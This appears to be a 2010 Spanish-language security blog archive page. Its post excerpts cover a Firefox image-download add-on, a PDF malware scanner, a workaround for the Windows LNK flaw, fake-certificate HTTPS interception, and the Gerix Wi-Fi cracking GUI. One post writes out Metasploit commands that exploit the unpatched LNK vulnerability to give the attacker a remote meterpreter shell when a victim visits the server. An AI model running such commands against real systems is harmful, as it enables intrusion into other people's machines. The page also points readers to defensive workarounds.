Entradas

Mostrando entradas de julio 22, 2010

Guardar automáticamente varias imágenes a la vez desde cualquier página

Imagen
En los años que llevas usando tu PC seguramente te habras encontrado con la tediosa tarea de guardar imagen por imagen, haciendo boton derecho sobre cada una de ellas y yendo al comando guardar imagen como...y así una por una.
Existe un add-on para mozilla firefox para simplificarnos el trabajo, se trata de darnos el poder de guardar masivamente imagenes (sean 18, 50, o 100 imágenes), para esto sólo tenemos que instalar este add-onen Mozilla firefox.
Esta extensión es increíble, permite filtrar imagenes, descargar las imagenes en la pestaña actual en la que nos encontramos, descargar la de todas las pestañas abiertas, modificar su tamaño y muchísimas opciones más.
Es el add-on que utilizo para hacer los threads en fotos frikis, lo mejor es optimizarlo para que "guarde automáticamente las que tienen mas de 350 px de ancho", en este caso, el addon, evita copiar el resto de imágenes como por ejemplo avatares, publicidades, etc etc.


Algunas capturas de las configuraciones que utiliz…

Scaneo de archivos PDF (y otros)

Imagen
Actualmente existen muchas herramientas y antivirus online pero hasta el momento era difícil encontrar alguna herramienta que informara en forma sencilla si un archivo de ofimática o PDF contenía scripts dañinos o porciones de código ejecutable embebidos en los mismos.

Ahora, a través de viCheck se puede realizar este tipo de análisis y el resultado será devuelto por correo electrónico. Además el sitio también permite realizar una búsqueda a través de Hash de archivos que se hayan subido previamente.



Información extraída de:
http://blog.segu-info.com.ar/2010/07/scaneo-de-archivos-pdf-y-otros.html

Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restric...

Imagen
Esta entrada detalla cómo aplicar una directiva de restricción de software para evitar la última vulnerabilidad crítica de Windows en todas sus versiones y para la que aún no hay parche. Es una libre adaptación y traducción de la entrada de Didier
Para aplicar la directiva hay que acceder desde el panel de control, herramientas administrativas: Directiva de seguridad Local.

La primera vez que se accede a las Directivas de restricción de software, es necesario crearlas pulsando sobre el botón derecho en esa carpeta.

Posteriormente se añadirá la ruta de los discos duros donde se encuentren ficheros de sistema y que serán excluidos de la directiva. Añadiendo una nueva ruta dentro de las "Reglas adicionales", en el ejemplo el disco es C:




Para evitar la vulnerabilidad, además de los archivos ejecutables EXE, también hay que añadir las librerías DLL. En las propiedades de "Obligatoriedad", seleccionando "Todos los archivos de software"

Por último, se modificará el f…

MITM https con Certificados Falsos a nivel de usuario en Firefox

Imagen
Estaba el otro día oyendo hablar sobre cómo los gobiernos pueden interceptar y descifrar el tráfico SSL y, en particular, el Http-S. Resumiendo, todo se trata de que llega el gobierno de turno a una Autoridad Emisora Raíz de Confianza y le dice "o me das un Certificado de Entidad Intermedia Emisora de Certificados o se te va a caer el pelo". Y, claro, cuando tu gobierno te pide las cosas con educación, hay que ser muy poco patriota para negarse.

Al final, ese gobierno podría emitir certificados a nombre de cualquier sitio web que se le ocurra. Y los navegadores aceptarían dichos certificados como válidos. El resto del ataque sería un MITM de los de toda la vida.

Pero como me cuesta mucho mantener la atención fija en una sola cosa, mientras escuchaba el programa mi cabeza se fue por los cerros de Úbeda. Y pensé en algo de lo que me extraña no haber oído antes en relación con los virus y el phishing:

Supongamos que tu ordenador ha pillado un virus. Y que el virus te m…

[Gerix] Wifi Cracker NG

Imagen
Bueno... Hace tiempo que había prometido subir información sobre Wireless Hack y me encuentro con este video de Gerix IT que es una interfaz gráfica verdaderamente global para Aircrack-NG incluyendo herramientas extras útiles.Actualmente Gerix Wifi Cracker está disponible y soportado nativamente por BackTrack (pre-instalado con la versión 4 final) y todas las distribuciones basadas en Debian (Ubuntu, Kubuntu, etc...).

Explotando "LNK" con Metasploit - Método 1

[*] - Explotando "LNK" con Metasploit - Método 1
[*] - Explotando "LNK" con Metasploit - Método 2

Metasploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute set SRVHOST 192.168.162.136 set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.162.136 set LPORT 443 exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
[*] Microsoft Security Advisory (2286198)
[*] Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Dir…